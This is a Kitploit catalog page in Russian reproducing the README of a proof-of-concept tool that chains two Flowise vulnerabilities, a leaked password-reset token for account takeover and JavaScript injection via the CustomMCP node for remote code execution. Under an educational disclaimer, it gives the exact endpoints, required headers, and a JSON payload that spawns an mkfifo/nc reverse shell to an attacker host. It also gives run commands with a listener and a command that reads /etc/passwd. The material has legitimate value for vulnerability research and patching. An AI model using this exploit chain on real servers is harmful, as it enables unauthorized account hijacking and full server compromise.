Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-58434-AND-59528-POC — Модульный PoC для CVE-2025-58434 (захват учетной записи) и CVE-2025-59528 (удаленное выполнение кода) в Flowise. Автоматизирует полную цепочку атак от неавторизованной утечки токена до удаленного выполнения кода через reverse shell или пользовательскую команду. | Kitploit
Инструменты/GitHubGitHub/kartik2005221/cve-2025-58434-and-59528-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubkartik2005221/cve-2025-58434-and-59528-poc

CVE-2025-58434-AND-59528-POC

Модульный PoC для CVE-2025-58434 (захват учетной записи) и CVE-2025-59528 (удаленное выполнение кода) в Flowise. Автоматизирует полную цепочку атак от неавторизованной утечки токена до удаленного выполнения кода через reverse shell или пользовательскую команду.

Репозиторий
19105 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Flowise Dual CVE PoC — CVE-2025-58434 + CVE-2025-59528

CVE-1 CVE-2 CVSS Python License

⚠️ Только для образовательных целей и авторизованных исследований безопасности.
Запуск этого инструмента против систем, которыми вы не владеете или для тестирования которых у вас нет письменного разрешения, является незаконным.


Содержание

  • Обзор
  • Детали уязвимостей
    • CVE-2025-58434 — Перехват учётной записи
    • CVE-2025-59528 — Удалённое выполнение кода
  • Полная цепочка атаки
  • Затронутые версии
  • Структура репозитория
  • Требования
  • Установка
  • Использование
    • Поведение по умолчанию
    • Экран справки
    • Режим цепочки
    • Модуль — ATO
    • Модуль — Login
    • Модуль — RCE
  • Справка по флагам
  • Обратный шелл против пользовательской команды
  • Пример вывода
  • Устранение уязвимостей
  • График раскрытия
  • Ссылки
  • Отказ от ответственности

Обзор

Этот репозиторий объединяет две критические уязвимости в Flowise в единый модульный PoC-инструмент.

CVE-2025-58434CVE-2025-59528
ТипПерехват учётной записиУдалённое выполнение кода
Требуется аутентификацияНетДа (любая действительная учётная запись)
CVSS9.8 КритическийКритический
ЗатронутыОблако + Самостоятельный хостингСамостоятельный хостинг

Две уязвимости естественным образом объединяются: CVE-2025-58434 предоставляет неаутентифицированный перехват учётной записи, что удовлетворяет требованию аутентификации для CVE-2025-59528 — достигая неаутентифицированного RCE в одном автоматизированном запуске.


Детали уязвимостей

CVE-2025-58434 — Перехват учётной записи

Корневая причина: Конечная точка forgot-password возвращает токен сброса пароля (tempToken) непосредственно в теле HTTP-ответа вместо отправки только по электронной почте.

Шаги атаки:

  1. POST /api/v1/account/forgot-password с любым зарегистрированным email
  2. Прочитать tempToken из JSON-ответа — доступ к почте не требуется
  3. POST /api/v1/account/reset-password с утёкшим токеном → установить новый пароль
  4. Войти в систему как жертва

Утёкший ответ (сокращён):

{
  "user": {
    "email": "[email protected]",
    "tempToken": "LEAKED_TOKEN_HERE",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

CVE-2025-59528 — Удалённое выполнение кода

Корневая причина: Узел CustomMCP передаёт предоставленный пользователем mcpServerConfig непосредственно в конструктор Function() в JavaScript без санитизации. Поскольку Flowise работает в Node.js, внедрённый код имеет полный доступ к child_process, fs и всем встроенным модулям Node.js.

Уязвимый путь кода:

POST /api/v1/node-load-method/customMCP
  -> convertToValidJSONString()
    -> Function('return ' + mcpServerConfig)()   ← несанитизированный пользовательский ввод

Необходимые заголовки:

Content-Type:   application/json
x-request-from: internal
Cookie:         token=<jwt>; refreshToken=<jwt>; connect.sid=<sid>

Полезная нагрузка по умолчанию (обратный шелл):

{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f\");return \"shell_fired\";})()})"
  }
}

Примечание: Полезные нагрузки обратного шелла используют cp.exec() (асинхронно / "запустил и забыл"), поэтому HTTP-запрос завершается немедленно и инструмент не таймаутится. Обычные команды используют cp.execSync() и возвращают вывод встроенно.


Полная цепочка атаки

Attacker                              Flowise API
   │                                      │
   │  [CVE-2025-58434]                    │
   │  POST /forgot-password {email}       │
   │─────────────────────────────────────►│
   │◄─────────────────────────────────────│
   │  201 { tempToken: "abc..." }         │  ← token утёк в ответе
   │                                      │
   │  POST /reset-password                │
   │  {email, tempToken, newPassword}     │
   │─────────────────────────────────────►│
   │◄─────────────────────────────────────│
   │  201 OK (tempToken очищен)           │  ← ATO завершён
   │                                      │
   │  [CVE-2025-59528]                    │
   │  POST /auth/login {email, newPass}   │
   │─────────────────────────────────────►│
   │◄─────────────────────────────────────│
   │  200 OK + Set-Cookie: token=...      │  ← cookies извлечены
   │                                      │
   │  POST /node-load-method/customMCP    │
   │  {mcpServerConfig: <js-revshell>}    │
   │─────────────────────────────────────►│
   │                              [exec() срабатывает в фоне]
   │◄─────────────────────────────────────│
   │  200 {"shell_fired"}                 │
   │                                      │
   Слушатель nc атакующего ←────────────── Сервер подключается обратно
   ✓  Полный RCE с нулевыми учётными данными

Затронутые версии

КомпонентСтатус
Flowise Cloud (cloud.flowiseai.com)Затронут CVE-2025-58434
Flowise самост. хостинг (все версии до патча)Затронут обеими CVE

Проверьте официальные уведомления безопасности Flowise для номеров исправленных релизов.


Структура репозитория

flowise-dual-cve-poc/
├── flowise_poc.py      # Основной PoC — все модули + режим цепочки
├── requirements.txt    # Зависимости Python
├── README.md           # Этот файл
└── DISCLAIMER.md       # Полное юридическое уведомление

Требования

  • Python 3.7+
  • Библиотека requests

Установка

git clone https://github.com/yourhandle/flowise-dual-cve-poc
cd flowise-dual-cve-poc
pip install -r requirements.txt

Использование

Поведение по умолчанию

Флаг режима не требуется. Если вы запускаете скрипт без --chain или --module, он автоматически запускается в полном режиме цепочки. Полезная нагрузка RCE по умолчанию — обратный шелл — просто укажите --lhost и --lport.

# Минимальный вызов — полная цепочка + обратный шелл
python3 flowise_poc.py \
  -u http://flowise.example.com \
  -e [email protected] \
  --lhost 10.10.16.35 \
  --lport 4444

Запустите свой слушатель перед выполнением:

nc -lvnp 4444

Экран справки

python3 flowise_poc.py -h

Режим цепочки

Выполняет все четыре шага от начала до конца: утечка токена → сброс пароля → вход → RCE.

# Обратный шелл (полезная нагрузка по умолчанию)
python3 flowise_poc.py --chain \
  -u http://flowise.example.com \
  -e [email protected] \
  --lhost 10.10.16.35 --lport 4444

# Пользовательская команда вместо обратного шелла
python3 flowise_poc.py --chain \
  -u http://flowise.example.com \
  -e [email protected] \
  -c "cat /etc/passwd"
Скачать инструмент